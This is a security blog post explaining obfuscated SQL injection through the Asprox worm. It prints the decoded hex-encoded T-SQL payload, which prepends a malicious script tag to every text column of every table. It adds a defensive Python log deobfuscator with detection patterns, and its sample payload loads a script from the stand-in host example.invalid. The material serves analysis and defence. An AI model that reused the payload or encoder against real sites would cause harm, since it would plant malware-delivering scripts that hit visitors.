Security Street Knowledge
  • Obfuscated SQL Injection

    Take a look at this paragraph. Can you read what it says? All the letters have been jumbled (mixed); only the first and last letter of each word is in the right place:

    Unisg the icndeblire pweor of the hmuan mnid, aocdcrnig to rseecrah at Cmabrigde Uinervtisy, it dseno’t mttaer in waht oderr the lterets in a wrod are, the olny irpoamtnt tihng is taht the frsit and lsat ltteer be in the rhgit pclae. An atactk can be a taotl mses but you can dceode it and sitll raed it whoutit a pboerlm. Take the extra step to raed the mnid of a hcaekr.


    Unfortunately, cyber security attacks are not always as easy to read as the example above. The bad guys know that we are getting better at identifying their web-based attacks, so in recent years they have begun obfuscating their malicious payloads. An obfuscated payload is crafted to slip past a web application firewall (WAF), or simply to make it hard for even a trained eye to recognise what is, underneath, a plain SQL injection attack.

    Now take a look at one of the more common obfuscated SQL injection attacks, described as an “ASCII HEX Encoded/Binary String Automated SQL Injection Attack”. It is an example of a new and growing class of SQL web worms: the injected statement is hidden inside a hexadecimal literal, which the database server converts back to text with CAST() and then runs with EXEC(), so the words a WAF or an analyst would look for (update, sysobjects, script) never appear in the request as plain text.


    ASCII HEX Encoded/Binary String

    Only the tail of the captured request line survives here. The hexadecimal digits 437572736F72 spell “Cursor”, the last word of the encoded statement; %20 is a URL-encoded space, and the remainder converts the hex string to text and executes it:

    437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1

    ASCII HEX Encoded/Binary String Automated SQL Injection Attack

    1. The attack injects an IFRAME (in the decoded sample below, a script tag) into the website’s pages, which then load a malicious JavaScript file called w.js in visitors’ browsers.

    2. w.js is not a virus itself, but it downloads a malicious binary.

    3. Now all the attacker has to do is steer visitors to the infected website through other embedded IFRAMEs and XSS scripts.

    4. The initial redirect can come from regular visitors to a site they assume is trusted, or from a link distributed as a sales advertisement in an e-mail.


    Deobfuscated – Asprox SQL Injection Worm (decoded using Burp Suite)

    The outer statement wraps the real payload in CAST(0x… AS CHAR(4000)) and runs it with EXEC(@S). The hexadecimal literal decodes to the cursor loop shown indented below. The column list of the SELECT, part of its WHERE clause and the script URL did not survive in this copy and are left blank; the ASCII quoting has been restored (inside a T-SQL string, '' is an escaped single quote):

    DECLARE @S CHAR(4000);
    SET @S=CAST(0x
        DECLARE @T varchar(255),@C varchar(4000)
        DECLARE Table_Cursor CURSOR FOR
            select , from sysobjects a,syscolumns b
            where and a.xtype='u'
              and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
        OPEN Table_Cursor
        FETCH NEXT FROM Table_Cursor INTO @T,@C
        WHILE(@@FETCH_STATUS=0)
        BEGIN
            exec('update ['+@T+'] set ['+@C+']=''"></title><script src=""></script><!--''+['+@C+']
                  where '+@C+' not like ''%"></title><script src=""></script><!--''')
            FETCH NEXT FROM Table_Cursor INTO @T,@C
        END
        CLOSE Table_Cursor
        DEALLOCATE Table_Cursor
    AS CHAR(4000));
    EXEC(@S);

    What the loop does: in sysobjects, xtype='u' selects user tables; in syscolumns the xtype values 99, 35, 231 and 167 are ntext, text, nvarchar and varchar. The cursor therefore visits every text-like column of every user table and, through a dynamically built UPDATE, prepends the script tag to each value that does not already carry it. The leading "></title> breaks out of whatever attribute or title element the stored value is rendered inside, and the trailing <!-- comments out the rest of the surrounding markup, so the script loads wherever the column appears on a page. Note that the worm needs no knowledge of the site’s schema at all, which is why one payload could hit thousands of unrelated sites.
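    To show how a defender reverses this encoding on the wire rather than by hand in Burp, here is an added Python example (not code from the original post or from the Asprox analysis). It URL-decodes a request line (including double encoding), finds CAST(0x… AS CHAR(n)) literals, decodes the hex back to T-SQL for both single-byte CHAR and UTF-16LE NCHAR payloads, and flags the cursor-worm indicators in the decoded statement. The log lines are constructed for the example; the page path, the script host example.invalid, and the SELECT column list and join condition in the sample statement are assumptions, since this copy of the post lost them.

```python
"""Deobfuscate CAST(0x...) hex-encoded T-SQL injection from web server logs.

Added example, not the post's own code. The sample requests below are constructed."""
import re
from urllib.parse import unquote

# T-SQL's CAST(0x<hex> AS CHAR(n)) (or NCHAR/VARCHAR/NVARCHAR) used to hide a statement.
HEX_CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)

# What the decoded statement looks like when it is the Asprox-style cursor worm.
INDICATORS = {
    "enumerates sysobjects/syscolumns": re.compile(r"\bsys(?:objects|columns)\b", re.I),
    "opens a cursor over tables/columns": re.compile(r"\bCURSOR\s+FOR\b", re.I),
    "dynamic UPDATE through exec()": re.compile(r"\bexec\s*\(\s*'?\s*update\b", re.I),
    "appends a <script src=...> tag": re.compile(r"<script\s+src=", re.I),
}


def url_decode_fully(text, max_rounds=3):
    """Undo one or more layers of percent-encoding; double encoding is a common WAF dodge."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def decode_hex_literal(hex_digits):
    """Turn a 0x... literal back into text.

    CHAR payloads are single-byte; NCHAR/NVARCHAR payloads are UTF-16LE, which
    shows up as a NUL byte after every ASCII byte."""
    if len(hex_digits) % 2:
        hex_digits = "0" + hex_digits  # left-pad so bytes.fromhex() accepts odd-length literals
    raw = bytes.fromhex(hex_digits)
    if raw and len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def deobfuscate_request(request_line):
    """Return (readable request, [decoded statements]) for one raw request line."""
    text = url_decode_fully(request_line)
    statements = []

    def _replace(match):
        sql = decode_hex_literal(match.group(1))
        statements.append(sql)
        return "'" + sql + "'"  # show the statement where the hex blob was

    return HEX_CAST_RE.sub(_replace, text), statements


def analyse_log(lines):
    """Return (line number, decoded statement, [matched indicators]) per hex-encoded payload."""
    findings = []
    for number, line in enumerate(lines, start=1):
        _, statements = deobfuscate_request(line)
        for sql in statements:
            hits = [name for name, rx in INDICATORS.items() if rx.search(sql)]
            findings.append((number, sql, hits))
    return findings


def build_hex_request(inner_sql, path="/page.asp?id=1"):
    """Wrap a statement the way the worm did, so the constructed sample log is realistic."""
    hex_blob = inner_sql.encode("latin-1").hex().upper()
    sql = f";DECLARE @S CHAR(4000);SET @S=CAST(0x{hex_blob} AS CHAR(4000));EXEC(@S);--"
    return f"GET {path}{sql.replace(' ', '%20')} HTTP/1.1"


# Constructed sample statement modelled on the decoded Asprox payload above. The column
# list, the join condition and the script host are assumptions, not taken from the post.
INNER_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=''\"></title><script src=\"http://example.invalid/w.js\">"
    "</script><!--''+['+@C+'] where '+@C+' not like ''%\"></title>"
    "<script src=\"http://example.invalid/w.js\"></script><!--''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)

# Constructed log lines: a benign request, the worm, and a benign request that mentions "cursor".
SAMPLE_LOG = [
    "GET /page.asp?id=1 HTTP/1.1",
    build_hex_request(INNER_SQL),
    "GET /search.asp?q=cursor%20tutorial HTTP/1.1",
]

if __name__ == "__main__":
    for number, sql, hits in analyse_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}\n  {sql[:80]}...")
```

    Run against the constructed log, only line 2 is reported, with all four indicators, and the decoded statement is byte-for-byte the one that was hex-encoded; the benign request that merely contains the word “cursor” is not flagged because it carries no CAST(0x…) literal. The indicators are matched against the decoded statement rather than the raw request, which is the whole point: the raw request contains none of those words.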




    Note: “SQL injection attacks enable malicious users to execute commands or store content in the application’s database.”
